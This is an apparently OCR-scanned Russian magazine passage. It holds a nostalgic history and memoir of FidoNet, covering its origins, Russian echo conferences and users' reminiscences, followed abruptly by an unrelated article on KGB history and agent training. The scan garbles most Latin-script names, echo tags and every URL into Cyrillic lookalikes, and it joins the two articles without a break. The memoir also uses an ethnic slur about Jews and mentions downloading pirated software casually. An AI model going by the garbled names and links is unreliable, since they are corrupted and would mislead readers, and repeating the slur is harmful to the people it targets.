но специальных утилит тогда не было. Поэто- 
му через какое-то время Дженнингс, будучи 
неплохим программером, решил написать 
софтину, которая сама будет дозваниваться 
на нужные номера, отправлять почту и заби- 
рать файлы. А уже летом 1984 г. появилась 
программа Ибо. В ее основу легла пакетная 
система передачи данных - так трафик пере- 
давался намного быстрее, что снижало рас- 
ходы на межгород. Днем на телефонах Тома 
и Джона висели станции ВВЗ, а по ночам к 
работе приступала Рібо, пробивающаяся к 
бордам и рассылающая на них письма. 




| Отец Фидо - Том Дженнингс 



Программка пришлась по душе сисопам 
американских ббсок и прочно осела на вин- 
тах и дискетах их компьютеров. Стало оче- 
видно, что коммуникация таким образом 
намного проще и удобнее, чем простые 
блуждания по ВВЗ. Ведь нужно было только 
написать письмо, указать адресата, все ос- 
тальное Ибо делала за тебя. 

К концу лета 1 984 г. образовалась сеть 
пользователей Ибо. Название ее было оче- 
видным - РібопеІ, а мемберы сети - в авгус- 
те их насчитывалось более тридцати - назы- 
вались нодами (с англ. - узел). 

Подключиться к сети было просто - дос- 
таточно было позвонить Тому или скинуть 
ему мессагу с сообщением, что у тебя уста- 
новлена и работает программа Рібо. Он тут 
же заносил человека в ноделист (список 
фидошников), и тот автоматически стано- 
вился членом сети. Когда сетка еще не 
пользовалась большой популярностью, фи- 
дошная жизнь была спокойной и размерен- 
ной. С приходом новых людей появились 
новые проблемы. В первую очередь они ка- 
сались липовых номеров. Люди, просившие 
добавить их в ноделист, оставались там и 
после того, как прекращали юзать Рібо. 

Или, к примеру, человек менял номер, за- 
быв сообщить об этом Дженнингсу. Другие 
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мемберы продолжали названивать по опуб- 
ликованному номеру, превращая жизнь его 
владельца в кошмар. 

В сентябре проектом заинтересовались 
компьютерщики из Сент-Льюиса и предло- 
жили свою помощь в поддержке сети. С их 
помощью удалось избавиться от многих 
проблем, включая липовые номера. С рос- 
том числа нодов стало очевидным, что ме- 
тод прямой передачи пакетов между узлами 
А и В нецелесообразен. Необходимо было 
внести в программу возможность отправлять 
пакеты сразу нескольким системам. Также 
появилась потребность в идентификации 
каждого подключенного юзера. Все это и 
многое другое реализовывалось в новых 
версиях программы Ибо. 

Одним из важнейших изменений в исто- 
рии Фидонет стало создание ЕсМотаіІ в 
1 985 г. До этого времени сеть использова- 
лась в основном для личной переписки. Но 
группа сисопов из Далласа попыталась сов- 
местить нетмейл с принципом распределен- 
ной передачи пакетов. В результате этого 
фидошники получили есМоез - тематические 
конференции, в которых они могли совмест- 
но обсуждать интересующие их темы. 

В последующие годы сеть быстро росла, 
проникая в самые разные уголки Земного 
шара. В феврале 1985 года в Ибо насчиты- 
валось 160 нодов, в начале 1992 их было 
уже более 20 тысяч. 



. и 




Том Дженнингс за рабочим местом 



А ТЕРНИСТЫЙ ПУТЬ 
ФИДОШНИКП 

В СНГ Фидо начало развиваться с 1990 г., 
отправной точкой стал город Новосибирск. 
Зарождалось все экспериментальными путя- 
ми. Кто-то нашел под кроватью модем и ре- 
шил попробовать соединиться с единствен- 
ной в России московской Кгетііп ВВЗ. По- 
том начались дозвоны в Польшу на скорости 
2400, сливание мегабайт вареза. Появилось 
несколько новых ВВЗ: Могпіпд Зіаг и леген- 
дарная ТМе Соиіі о{ Фе Сгітзоп Кіпд. Откуда- 
то достали фидошный софт, стали настраи- 
вать. Появились первые ноды... 

История развития русской Фидонет увле- 
кательна и насыщена событиями. По адресу 
Шр://(ад$.огд.ги/[ібопе№оІіі$Ш^ лежит большой 
исторический манускрипт, в составлении ко- 
торого принимали участие десятки людей. 
Если хочешь знать, как все было на самом 
деле, - рекомендую почитать. 

Лично я подключился к Фидохе в 1 996 г. - 
как раз в самый пик популярности сети в на- 
шей стране. Позвонив после наводки знако- 
мого фидошника сисопу и договорившись о 
получении пойнта в обмен на пиво, стал 
ждать. Вечером пришли двое дядей и, дор- 
вавшись до моего компа, стали что-то увле- 
ченно ковырять и настраивать. А в конце, по- 
жав мне руку, поздравили с внедрением в 
большую «Сеть друзей». Окрыленный этой 
вестью, я вручил им два батла пива, которые 
давно превратились в лед (додумался же в 
морозилку засунуть), и пообещал, что пар- 
ням не придется за меня краснеть. Наивное, 
скажу я вам, обещание. Вообще явление си- 
сопа пойнту для настройки ему софта случа- 
ется нечасто, обычно новичкам приходится 
самостоятельно копаться в конфигахТ-МаіГа 
(фидошный популярный мейлер), СоІбЕб’а 
(почтовый клиент) и РазІЕсІіо (распаковщик). 
Сейчас, правда, полегче - в сети есть само- 
настраивающиеся пакеты. Ввел свое имя, 
адрес, прописал пути, нажал на кнопочку - 
и фидоха готова к работе. 

В течение следующей недели я подписал- 
ся на 3/4 всех доступных эхоконференций 
(около 250 штук), чем вогнал в ужас своего 
босса (так пойнты называют нодов) - трафик 
я гонял нешуточный. Причем пролистывал 
практически каждую эху, а некоторые прочи- 
тывал от корки до корки (НІІМОВ.РИТЕВЕО, 
ВІІ.САМЕ.НЕВОЕЗ и ВІШСКІР). И конечно, 
не упускал возможности вставить пять копе- 
ек в интересные дискуссии. Еще позже отк- 
рыл для себя чудесные возможности коди- 
ровки ІІІІЕ, которая позволяла разбивать 
файлы на текстовые фрагменты и пересы- 
лать через Фидо. В следующие несколько 
месяцев я был постоянным гостем большин- 
ства доступных в сети РВЕО-серверов (фай- 
ловые архивы, которые можно было скачи- 
вать по Фидо). Сливал все подряд по прин- 
ципу «лишний софт не помешает». В отдель- 
ные дни количество писем в моем нетмыле 
доходило до тысячи, превышая по трафику 
суммарный объем всех подписанных эх. О 
том, что есть еще интернет, я догадывался, 
но всерьез его не воспринимал. Все фидош- 
ники тогда были уверены, что инет и рядом 
не стоял с их любимой сеткой по части об- 
щения и приобретения новых друзей. 

Со временем я окончательно втянулся и 
уже не представлял ни дня своей жизни без 




того, чтобы дозвониться до босса, вытянуть 
1 0 мег почты и просмотреть новые сообще- 
ния в любимых эхах. Я был счастлив. 

^эхи 

Эхи - это, по сути, и есть Фидо. Места, где 
можно получить совет, обсудить актуальную 
тему или просто подурачиться. Они во мно- 
гом напоминают конференции ІІзепеІ, усту- 
пая им в оперативности, но выигрывая в 
удобстве. С 1990 г. эх расплодилось столь- 
ко, что вряд ли можно найти такую тему, на 
которую не создали специализированную 
эхоконференцию. Начиная с РѴГ.САТЗ.СШВ, 
где тусят кошколюбы, заканчивая ВІІ.ІМІІШ, 
где обсуждаются воины тени, - чем бы ты ни 
увлекался, ты всегда сможешь найти себе 
место по душе и понимающих тебя собесед- 
ников. У каждой эхи есть свои правила, ук- 
лонение от которых карается в зависимости 
от тяжести нарушения, вплоть до пожизнен- 
ного отключения от конференции. 

В русскоязычном Фидо более 3 тысяч эх, 
правда, за последние годы их количество 
сократилось. Каждая эха - это отдельное 
комьюнити со своими звездами и памятными 
событиями. Расскажу про некоторые из них... 

КІІ.АМЕКООТ - одна из самых первых 
эх, была образована летом 1 992 г. после ре- 
организации ЗШНІІМОВ. Официально пред- 
назначена для поста свежих анекдотов, но 
реально стала одним из основных мест про- 
ведения флеймов. Поистине легендарным 
стал анек про дедушку: «Снесла курочка де- 
душке яичко. Начисто снесла». Приелся он 
еще в 93-м и из поколения в поколения пе- 
редавался на страницах КІІ.АМЕКООТ. Было 
время, когда его рассказывали по нескольку 
раз в неделю, после чего анекдот про Рябу 
стал жесточайшим оффтопиком, за который 
отключали от эхи сразу и навсегда. Памятны 
выборы модератора эхи. Народ шумел, аги- 
тировал, выдвигал собственные кандидату- 
ры, обещая золотые горы :). 

ЗУ.КАЗНЕМКО.ЮШ. - несмотря на 
название, эха практически не имеет никако- 
го отношения к известной психбольнице. 
Создана она была в 1998 г. человеком, ши- 
роко известным как Медбрат. Основная те- 
матика конфы - высмеивание евреев путем 
высмеивания тех, кто высмеивает евреев. 
Очень популярными в этой эхе были класси- 
ческие жидовские фразы: «Вы антисемит?», 
«А почему вы спрашиваете?», которые вско- 
ре вышли за пределы ЗКІ_ и стали призна- 
ком кащенизма. Кащениты всячески завлека- 
ли новых жертв в свою альма-матер, попол- 
няя таким образом свою достаточно много- 





Ссылки по теме: 
л шл/ѵЛісІопеІ.огд - 
официальный сайт 
Рісіопеі 

л Шр://гіѵегЬЬ$. 
пеІДіс1о/Ы$Іогу - 
история сети устами 
Тома Дженнингса 
А ѴШѴѴ.ІІСІоИп. 
кіеѵ.иа - крупней- 
ший русскоязыч- 
ный ресурс, посвя- 
щенный Фидо 
^ ѴѴѴѴѴѴ.ТІСІО- 
опііпе.сот - фи- 
дошный гейт 
А Шр://М.кш.1о - 
архив НЦМОВ.РИ- 
ТЕКЕй 

а ѵѵшытюзкаіуик. 
сот/зНиШ/Кйо.Мт 
- фидошная книга 
рекордов :) 
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численную армию. Проводились целые опе- 
рации по захвату власти в популярных эхах. 

В конце концов кащенизм стал приравни- 
ваться к оффтопику, и за малейшие его про- 
явления наказывали переводом в «геасі опіу». 

ВІІ.РІСКІІР - эха, в которой зародилось 
русское пикап-сообщество. Зарегистриро- 
ванная в 1995 г., она быстро стала одной из 
самых популярных среди мужской половины 
Фидо. Первое время в ней можно было по- 
лучить грамотный развернутый ответ на лю- 
бой вопрос о соблазнении девушек. Потом 
эху заполонило бесчисленное количество пи- 
онЭров (юноши, не рубящие в теме, но мня- 
щие себя гуру), и она превратилась в помой- 
ку. В связи с этим на базе ру. пикап образо- 
валось несколько отдельных конф: ВІІ.РІСК- 
ІІР.РШГЕВЕО (избранные посты из ВІІ.РІСК- 
ІІР), ВІІ.РІСКІІР.СІІІВІІ (тусовка «отцов» пика- 
па), ВІШСКиР.РІОМЕЕВ (для новичков), 
ВІІ.АІМТІ-РІСКІІР (противники пикапа). Сей- 
час в эхе, в основном, ругаются те самые 
пионЭры, а все те, кто стоял у истоков, пе- 
ребрались в специализированные интернет- 
форумы. 

ЗІІ.Т0КМ02 - один из лидеров по коли- 
честву генерируемого трафика. Каждый день 
в этой эхе проходило по 100-200 писем. 
Весьма специфичное место. Цитирую отры- 
вок типичного трэда обитателей сутормоза: 

«КК: Не пойти ли мне спать?.. Как вы счи- 
таете? Да вы считать-то умеете? 

МЗР: 8 

ми 16 

МЗР: 32 
ми 64 

МЗР: 128 

Ми 256 

МЗР: 67108864» 

Характерна совершенно идиотскими диа- 
логами и постоянными перекличками по лю- 
бому поводу. Народ там тусовался соответ- 
ствующий: Фантик Полосатый, Крадущийся, 
Абаснуй, дядя Степа... По большому счету, 
эха развлекательная, и для тех, кто находит 
занимательными тупые разговоры ни о чем, 
она стала вторым домом. Кстати, комьюнити 
сутормоза было одним из самых больших в 
Фидо, а количество людей, имеющих в под- 
писи [Зи.Тогтог Іеат], насчитывало нес- 
колько сот человек. 

В Фидохе немало хакерских конф: 
ВІШЕТНАСК, ВІШАСКЕВ, 
ВЦ.НАСКЕВ.СІІММѴ, $СВАСК$, 
$СВАСК$.ТАІ_КЗ, РѴГ.СВАСК и другие. В се- 
редине 90-х в них можно было встретить из- 
вестных на хаксцене личностей, принять 
участие в увлекательной технической дискус- 
сии. Но со временем некоторые из них пос- 
тигла судьба ВІІ.РІСКІІР’а, остальные просто 
зачахли из-за отсутствия людей. 




А самой известной и популярной в фи- 
дошной среде является НІІМОВ.РИТЕВЕО - 
«геасі опіу» эха, в которой публикуются фор- 
варды смешных писем из других эх. Ссылки 
на такие письма присылают модератору са- 
ми фидошники, и он уже отбирает из них 
достойные размещения в НЕ. Кстати, мои 
письма попадали в эху не меньше десяти 
раз, чем я несказанно горд :). 

А СЕТЬ ДРУЗЕЙ 

В то время как интернет называют глобаль- 
ной паутиной, Фидо известна как Сеть дру- 
зей. В 90-92 гг., когда народу было еще 
немного и все друг друга знали, это 
действительно было так. Потом новые пойн- 
ты повалили пачками, и флеймы с топиками 
«ЗІагсгаЙ ѵз ТоІаІ АппіЫІаІіоп», «РазсаІ ѵз 
С++», «Кошки ѵз собаки» заполонили все 
фидошное пространство. Тот же «ЗС ѵз ТА» 
длился в ЗІІ.САМЕ.ЗТВАТЕСІУ почти пол года 
и чуть не закончился кровопролитием :). 

Сам я в межнациональных рознях не 
участвовал, но, сколько себя помню, тусил в 
ЗІШАЕЛ). В отличие от ЗІІ.РІ-АМЕ и 
ТУТ. ВСЕ. НАСРЕМ, в которых все друг друга 
покрывали матом, здесь велись исключи- 
тельно интеллигентные флеймы. Мы нена- 
вязчиво, дружелюбно, с улыбкой на лице на- 
зывали друг друга жалкими, ничтожными 
личностями и приводили тому тысячи обос- 
нованных аргументов. В 2001 -2002 гг. в эхе 
сформировался костяк «старичков», которые 
в тихое время лениво перегавкивались друг 
с другом, но как только появлялся чужак, 
объединялись и дружно обсирали его :). Ве- 
лись даже хроники «Сунаездни», в которых 
рассказывалось, кто на этой неделе обла- 
жался и кого из новых в нее занесло. 

Также с улыбкой вспоминается трэд в 
ВІШЕТНАСК, где мы с одним пареньком 
ожесточенно спорили о значении слова «хаке- 
ры», о том, что есть хаксцена, и тому подоб- 
ных вещах. Из искры разгорелось пламя, 




Карикатура фидошника 



флейм перерос в длинную переписку, где раз- 
мер каждого письма доходил до 50 килобайт. 
Ясное дело, модератор нас попросил пойти 
вон, и переписка продолжилась уже в прива- 
те, закончившись только полгода спустя. 

Чтобы поддерживать порядок в сети, в 
80-х гг. появился документ, известный как 
«Фидополиси». Том Дженнингс, будучи 
прожженным анархистом, не терпящим огра- 
ничений свободы слова, отозвался об этом 
1 00-килобайтном опусе коротко и ясно: «016 
зтеііу сгоск о\ збіі». Тем не менее, многие 
фидошники считают фидополиси своей 
конституцией и при решении конфликтов 
зачастую ссылаются на него. 

Распространенным явлением в Фидо яв- 
ляются сисопки и поинтовки - риаллайфовые 
встречи фидошников. Первые обычно соби- 
рают сисопов, которые под пивком с энтузи- 
азмом обсуждают перспективы дальнейшего 
развития сети. На вторые приходят пойнты, 
распивают горячительные напитки и обсуж- 
дают фидошное бытие. Обычно такие тусы 
проводятся на локальном уровне, но случа- 
ются и встречи всесоюзного масштаба. 
Раньше местом сбора глобальных поинтовок 
была московская ІТ-выставка Комтек. Сейчас 
народ ежегодно собирается в Крыму. 

В Фидо тусили многие известные в рунете 
личности. Алекс Экслер и Леонид Каганов 
свои первые творения размещали в фидош- 
ных эхах, а Сергей Лукьяненко черпал отсюда 
вдохновение для «Лабиринта отражений»... 

А Н0СТ0ЯЩЕЕ И БУДУЩЕЕ ФИДО 

В 2002 г. локальные эхи в моем провинци- 
альном городишке заглохли, трафик в люби- 
мых 31ШАЕ20 и ВІІ.САМЕ.НЕРОЕЗ упал до 
нуля, и я решил, что пора сваливать. К это 
времени у меня уже был анлим, и я поти- 
хоньку перебирался в ІіѵфигпаІ-комьюнити, 
которое оказалось не менее интересным, 
чем ранняя фидоха. 

Конечно, говорить о смерти Фидо в на- 
шей стране еще рано. Большинство эх по- 
прежнему функционируют, и в них пишет но- 
вое поколение фидошников, привлекаемое 
халявным доступом. Да и некоторые старич- 
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ки продолжают сидеть, скорее, по привычке, 
чем по любви. Но нет уже тех жарких деба- 
тов на актуальные темы, нет широкомасш- 
табных флеймовых войн, нет атмосферы, ко- 
торая заставляла вскакивать утром из посте- 
ли и бежать первым делом проверять почту. 
Да и отношение изменилось. Если раньше 
народ в эхах быстро сближался и часто про- 
должал конфовые дискуссии в привате, те- 
перь общение напоминает ни к чему не обя- 
зывающий разговор в очереди. Постояли, 
потрындели, разбежались и забыли. 

Несколько лет назад многие сравнивали 
Фидо с интернетом, приводя всевозможные 
аргументы в пользу первого и обсирая вто- 
рой. Козырем фидошников была халявность 
их сети. Теперь инет подешевел, разросся и 
подобных сравнений уже не возникает - кра- 
сочная, оперативная паутина взяла верх над 
старенькой фидонет. 

Фидошная технология (РТИ), несмотря на 
моральное устарение, используется для соз- 
дания других некоммерческих сетей. Прин- 
цип тот же, но масштабы другие. Появляют- 
ся все эти ЗсгеатМеТы и ОигМеТы с целью 
создать свою приватную сетку, где не будет 
ламеров, кащенитов и прочего сброда, ки- 
шащего в фидохе. И где можно установить 
свои правила и порядки. Кстати, на альтер- 
нативных платформах тоже были РТІМ-клоны. 
Например, всесоюзная ТХ-ЫеХ - очень изве- 
стная в узких кругах и ныне покойная сеть 
спектрумистов. 

Последнее время обычной практикой ста- 
ло забирать фидошную почту через интер- 
нет. Те, у кого анлимитный А08І_, оценят 
скорость, все остальные - оперативность. 
Скорость прохода писем в эхи будет намно- 
го выше, если получить ІР-поинта у московс- 
кого сисопа. 

Если у тебя есть инет и ты хочешь пос- 
мотреть своими глазами, что такое Фидо, 
не обязательно сливать пакет и искать сисо- 
па, который согласится тебя приютить. Сей- 
час есть много онлайновых гейтов, через ко- 
торые можно не только читать эхи, но и отп- 
равлять в них письма. Крупнейшим архивом 
фидошных конф является Шр://дгоир$.доодІе.ги. 

А МНЕНИЯ 

Ну и напоследок, по традиции, пару мнений от 
людей, которые раньше активно тусили в Фи- 
до и знают об атмосфере сети не понаслышке. 

Павел, 30 лет, ІТ-директор, модера- 
тор эхи ГШ.МООЕПАТОК. 

Давно это было. Компьютеры были мед- 
ленными, большими и тяжелыми. А все люди 
в Фидо - добрыми. Их было относительно 
немного, и среди них был большой процент 



хороших специалистов, поэтому я с удоволь- 
ствием читал технические эхоконференции (в 
основном по сетевой тематике и аппаратному 
обеспечению) и мнения моих собеседников 
были для меня очень важны. Как правило, в 
технической литературе даются императив- 
ные указания по настройке какого-либо обо- 
рудования либо дается обзор всех его воз- 
можностей. Но информацию о правильности 
одних решений и сомнительности других я 
смог почерпнуть только из общения в тех са- 
мых конференциях. Благодаря этому доволь- 
но быстро вырос в профессиональном плане. 
Я даже работу себе нашел по рекомендации 
одного из моих знакомых по Фидо - он уез- 
жал и рекомендовал меня на свое место, хо- 
тя до этого мы вживую ни разу не виделись. 
И уже почти 7 лет я работаю в этой компании. 

В нетехнических эхах (например старая 
РѴГ.ЕХІ.ЕВ.ОѴКА, РѴГ.І_ВСАТ.ТАІ_К, городские 
локалки), посвященных просто общению и 
юмору, я нашел людей из разных городов, с 
которыми было интересно и прикольно об- 
щаться. Со многими подружился, поддержи- 
ваю контакты и до сих пор езжу в гости. 

Фидо было и остается для меня сообщест- 
вом друзей. Моих друзей. Многие из них за- 
вязали и обитают в других местах, но я пом- 
ню, где зародилось это знакомство, и благо- 
дарен Фидо за это. Видимо поэтому я до сих 
пор поддерживаю пару узлов и готов возить- 
ся с толковыми новичками. 

Нынешнее Фидо уже не то, что раньше. 
Оно пережило нашествие потока технически 
неграмотной молодежи, стремившейся по- 
пасть в сеть из-за бесплатного доступа к кон- 
ференциям. С удешевлением интернета этот 
поток иссякает. Однако поддерживать Фидо в 
этот период отказались многие из старой 
гвардии. Сейчас те из них, что остались, за- 
нимаются Фидо по инерции, тот интерес, что 
был раньше, угасает. 

Зоя, 23 года, юрист, поэт, романтик. 

В Фидо я попала в 1 997 г. Совратила под- 
руга, перечислив все мыслимые и немысли- 
мые достоинства сетевого общения. Сначала 
я относилась к этим доводам скептически, 
подключилась потому, что это было бесплат- 
но и просто любопытно. Уже после первой 
недели стало ясно: без Фидо жизнь - не 
жизнь :)). Так как я неисправимая любитель- 
ница кошек, сразу влилась в дружный кол- 
лектив ВІІ.САТ8 и РѴГ.САТ.СШВ; так как 
люблю готовить, стала постоянной тусовщи- 
цей 51І.КІТСНЕІ\І; будучи по профессии жур- 
налисткой, открыла для себя 81І.ЛШАІ_І8Т, 
но самой родной на долгие годы стала 
ОВЕС. РАСТЕТ. В лице читателей этой эхи я 
нашла благодарных слушателей своих лите- 



ратурных бредней. Все мало-мальски стоя- 
щие стихи и рассказы отправлялись прями- 
ком в овес. В отличие от многих членов на- 
шего литкружка, я не только писала, но и чи- 
тала от корки до корки все произведения 
других авторов. Из памятных событий могу 
вспомнить замечательную поинтовку 1 999 
года. Я даже помню дату - 13 апреля. Имен- 
но там я впервые познакомилась со своим 
боссом, оказавшимся совершенно замеча- 
тельным, добрым и улыбчивым толстячком. 
Мы ели чебуреки, запивали их пивом, жизнь 
казалась яркой и дружелюбной. Один из ре- 
бят строил планы по захвату Фидошкой ар- 
мии интернетчиков, остальные подхватили, 
сыпались лозунги: «Фидо в каждый дом!». 

Да, замечательное было время. Помню, как 
всей нодой пришли на похороны Миши Куз- 
нецова - улыбчивого парня, принимавшего 
участие во всех наших поинтовках. Помню, 
как мне пытались переправить из Москвы 
файл размером 1 2 мегабайт в ІІІІЕ. В итоге 
получилась путаница, и мне пришлось пот- 
ратить кучу времени, чтобы собрать все 
вместе. Помню, как вместе с ребятами на- 
шего узла отправились на озеро на шашлыки 
с ночевкой и ночью у костра рассказывали 
друг другу страшилки про «Сисопа-маньяка», 
«Потерянного пойнта», «ВВ8 загубленных 
душ» и другие фидошные ужасы. И конечно, 
мой виртуальный роман с мальчиком из Кие- 
ва, который дарил мне АЗСІІ-шные розы :). 
Мы так с ним и не познакомились в ВІ_... 

Уже полгода, как я не читаю Фидо. Поухо- 
дили многие интересные мне люди, без них 
все по-другому. Теперь меня можно найти в 
ІіѵфигпаГе, где я продолжаю выкладывать 
свое творчество и, в первую очередь, стихи. 
А Фидо... оно всегда будет оставаться в мо- 
ем сердце как Сеть друзей, благодаря кото- 
рой мне удалось познакомиться с замеча- 
тельными людьми. ЗС 
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піогдеІаЬІе Кгетііп, К6В апіі тисН тоге... рекламный буклет американской туристической фирмы зазывает в Москву. Для многих 
I I туристов история крупнейшей в мире разведки оказывается привлекательней водки с матрешками и прогупки по Красной ппощади. 

В марте 2004 года Комитет государственной безопасности праздновал бы свое пятидесятилетие. Но во времена демократии 
произносить вспух одну из самых знаменитых аббревиатур в мире, ставшую таким же символом нашей страны, как спутник, бапет и водка, 
стапо депом практически неприличным. Поэтому юбилей главной советской охранки прошел практически незамеченным. 




В ЗПСТЕНШ КРУПНЕЙШЕЙ В МИРЕ РОЗВЕДКИ 





то же делало советскую раз- 
ведку если не самой мощной, 
то уж точно самой популярной 
разведкой в мире? 



А 



ГОЕ НОЧИНОЕТСЯ 
ІГ9БЯНКП? 



Тайная служба, разумеется, 
существовала в России и до КГБ, существу- 
ет и после. Меняются только названия, ор- 
ганизация и широта полномочий. В марте 
1953 года полномочия охранки стали неог- 
раниченными: под руководством Лаврентия 
Павловича Берии возглавляемое им Ми- 
нистерство государственной безопасности 
было объединено с Министерством внут- 
ренних дел - так появилось единое МВД 
СССР, задуманное Берией как самая влия- 
тельная организация страны. Такой она 
пробыла примерно два месяца, после чего 
Берию убрали, а его не в меру опасное де- 
тище разжаловали до Комитета. Созданный 
в марте 1954 года Комитет государствен- 
ной безопасности был вне контроля МВД. 

В положении КГБ, которое существовало с 
59 года, было четко записано, кому он слу- 
жит - Центральному комитету Коммунисти- 
ческой партии Советского Союза. 



В том же 1 954 году были определены це- 
ли и задачи новоиспеченного комитета, 
а также его структура. Главной задачей бы- 
ло сохранение существующего в стране го- 
сударственного строя. Сфера деятельности 
простиралась шире, чем у разведок других 
стран: помимо разведки и контрразведки в 
обязанности комитета входила охрана руко- 
водителей партии и правительства, идеоло- 
гический контроль населения, охрана госу- 
дарственных границ. 

При всех изменениях и перетасовках 
структура КГБ оставалась практически неиз- 
менной. Его костяк составляли четыре глав- 



ных управления (главка): разведка (Первое 
управление), контрразведка (Второе управле- 
ние), военная контрразведка (Третье управле- 
ние) и шифровальщики (Восьмое управле- 
ние). Неофициально пятым главком считалось 
знаменитое Пятое управление - управление 
по борьбе с диссидентами. Официальным его 
не делали, чтобы не давать Западу лишнего 
повода для идейных спекуляций. Помимо 
главков, существовало некоторое количество 
управлений, отделов и служб, занимающихся 
погранвойсками, экономической контрразвед- 
кой, промышленной разведкой и др. 

Точные данные о численности сотрудни- 
ков КГБ не были и вряд ли 
когда-нибудь будут опубли- 
кованы. Бывший председа- 
тель Комитета госбезопас- 
ности Николай Крючков зая- 
вил как-то, что общий сос- 
тав КГБ СССР на 1991 год 
насчитывал 480 тыс. чело- 
век, причем разведкой и 
контрразведкой было занято 
не более 7% сотрудников. 
Армия «добровольных по- 
мощников» (агентуры) КГБ 
только на территории СССР 
по официальным данным 
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доходила до 26 млн. человек, что составляло 
седьмую часть всего населения страны. Мой 
собеседник - бывший сотрудник Пятого уп- 
равления - считает эти заявления, мягко го- 
воря, преувеличенными. По своему управле- 
нию, одному из крупнейших, он называет 
цифру в десять тысяч сотрудников и сомне- 
вается, что в других управлениях их могло 
быть больше. Содержать больше было бы не 
только нерентабельно, но и обременительно. 
А учет «добровольных помощников» в Коми- 
тете не вели. Информация о зарплате сот- 
рудников КГБ тоже была преувеличена - на 
деле она редко превышала зарплату обычно- 
го советского инженера. Исключение состав- 
ляли лишь сотрудники Первого главка, но и 
здесь особо поживиться не удавалось. КГБ 
был не только орудием, но и жертвой андро- 
повской борьбы со взяточничеством. В це- 
лом же организация работала так же, как и 
любое советское учреждение: с планами, со 
сбоями и строго по расписанию. Ровно в 
шесть часов вечера здание на Лубянке пус- 
тело, сотрудники стремительно покидали ра- 
бочие места - чрезмерное рвение считалось 
не только ненужным, но и подозрительным. 
Вдруг трудяга там копирует секретные мате- 
риалы для передачи в ЦРУ? 

А КГБ КОК БРЕНД 

Юрий Владимирович Андропов возглавлял 
Комитет государственной безопасности 
СССР пятнадцать лет: с 1 967 по 1 982 год. 
Именно ему КГБ обязан своим лицом - он 
был его отцом, наставником и идеологом. 



Дело тут не только в таких популяризаторс- 
ких методах, как борьба с коррупцией, рас- 
ширение структур органов и повышение ок- 
ладов сотрудникам. Андропов продвигал КГБ 
как бренд, очистил профессию чекиста от 
компроматов 37-го года, разрекламировал 
этот «нелегкий труд». Профессия чекиста 
стала не просто престижной, она стала 
привлекательной, желанной, люди мечтали 
попасть в органы. 

Команда Андропова состояла из профес- 
сионалов, настоящих фанатов своего дела. 
Именно благодаря им появились спецпод- 
разделения «Альфа» и «Вымпел», которые 
сейчас считаются лучшими в мире, завое- 
вывая высокие оценки зарубежных спецс- 
лужб. Группа «Альфа» создана 29 июля 
1 974 года как подразделение КГБ по борь- 
бе с терроризмом. Группа специального 
назначения «Вымпел» образована 19 авгус- 
та 1981 года для выполнения штатных опе- 
раций за пределами Родины в интересах 
государства. 

А шпиономания 

Почти сорок лет Комитет государственной 
безопасности был сильнейшей разведкой в 
мире. Миф о всесильности КГБ старательно 
поддерживался, причем не только его 
представителями, но и невольно противни- 
ками. Как внутри страны, так и за ее преде- 
лами советская служба безопасности конт- 
ролировала все сферы жизни, ведя борьбу 
не только с иностранными разведками, но и 
с собственным народом. Она не считалась, 
она была лучшей разведкой в мире - ведь на 
нее работал почти весь советский народ. 
Метод подготовки разведчиков и числен- 
ность разведки были уникальны. Ни на одну 
спецслужбу мира не выделялось столько 
средств, как на КГБ. 

Настоящей эпохой расцвета КГБ стали 
годы холодной войны. Немного уступая со- 
перникам по уровню технической оснащен- 
ности, КГБ значительно превосходил их по 
всем остальным пунктам, включая количе- 
ство легальных резидентов в странах влия- 
ния. Первый главк, занимавшийся внешней 
разведкой, стоял особняком от остальных 
управлений. Разведчики были элитой ГБ, 
сюда готовили с детства. Потенциальные 
кадры начинали отбирать в Домах малютки 
чисто по внешним данным - предпочтение 
отдавалось полукровкам. Выбирали детей, 
отцами которых были студенты или аспи- 
ранты престижных вузов. 




Первая ступень обучения проходила в 
специализированном детском саду, где 
программа была направлена на развитие па- 
мяти, логики и восприятие языков. 

По окончании сада специальная комис- 
сия, куда входили медики, педагоги и предс- 
тавители КГБ, проводила очередной отбор 
детей для учебы в специнтернатах. В СССР 
было два интерната: в городе Бердске под 
Новосибирском и в Сучане Приморского 
края. Школьная программа была следующим 
звеном подготовки будущих разведчиков. До 
пятого класса уделялось пристальное внима- 
ние совершенствованию иностранных язы- 
ков, памяти и логического мышления. Осо- 
бое внимание уделялось поведению и этике- 
ту. В шестом классе учащихся делили на две 
группы - технарей и гуманитариев. В зависи- 
мости от группы делался упор и в програм- 
ме обучения. По окончании спецшколы вы- 
пускники были настолько хорошо подготов- 
лены, что без труда поступали в лучшие уни- 
верситеты мира. При этом у каждого была 
своя легенда, которая в случае проверки 
полностью исключала раскрытие агентов. 

Естественно, Комитет состоял не из одних 
только выходцев из интернатов. Отбор шел 
практически во всех крупнейших вузах сто- 
лицы, иногда уже начиная со спецшкол. Пер- 
вые показатели - внешние. Необходимые ус- 
ловия: безупречная родословная, идеологи- 
ческая чистота и выдержанность. Успешно 
прошедших проверку на профпригодность 
приглашали на обучение в Высшую школу 
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Юбилейный значок че- 
киста 







V 



Значок, который выда- 
вали за особые заслуги 
перед КГБ 



КГБ в Москве. И даже здесь далеко не все 
счастливчики получали приглашение в раз- 
ведку. Те, кому удавалось пройти все испы- 
тания, какое-то время еще стажировались в 
другой стране и только после этого получали 
направление в страну назначения. Вся эта 
хитроумная система позволяла минимизиро- 
вать риск побегов и предательств. Но иск- 
лючить его полностью было невозможно - 
именно перебежчики нанесли наибольший 
вред советской разведке, выдав больше ин- 
формации, чем накопали за десятилетия су- 
ществования КГБ все спецслужбы мира. 

Настоящими Штирлицами, супернераск- 
рываемыми агентами внедрения станови- 
лись очень немногие. Каждое такое внедре- 
ние было тщательно продуманной, блестя- 
ще проведенной операцией. Один из самых 
известных нелегальных резидентов - Конон 
Трофимович Молодый. Русский по рожде- 
нию, он рос и воспитывался в Америке, од- 
нако по достижении совершеннолетия не 
принял американского гражданства, а вер- 
нулся в Советский Союз. Там его прибрало 
НКВД. В 1955 году Молодый приезжает в 
Лондон как канадский гражданин Лонсдейл, 
поступает в Школу изучения стран Востока 
и Африки при Лондонском университете, 
открывает собственное дело. Проходит нес- 
колько лет - и у него четыре предприятия, 




приносящие миллионы долларов. Он не 
только сам платит своим агентам, но и при- 
носит КГБ огромные прибыли. Впрочем, та- 
кое положение дел длилось недолго: уже в 
1961 году Молодыя раскрыли и посадили 
британские спецслужбы. Однако его аген- 
турная сеть еще долго работала на советс- 
кую разведку. 

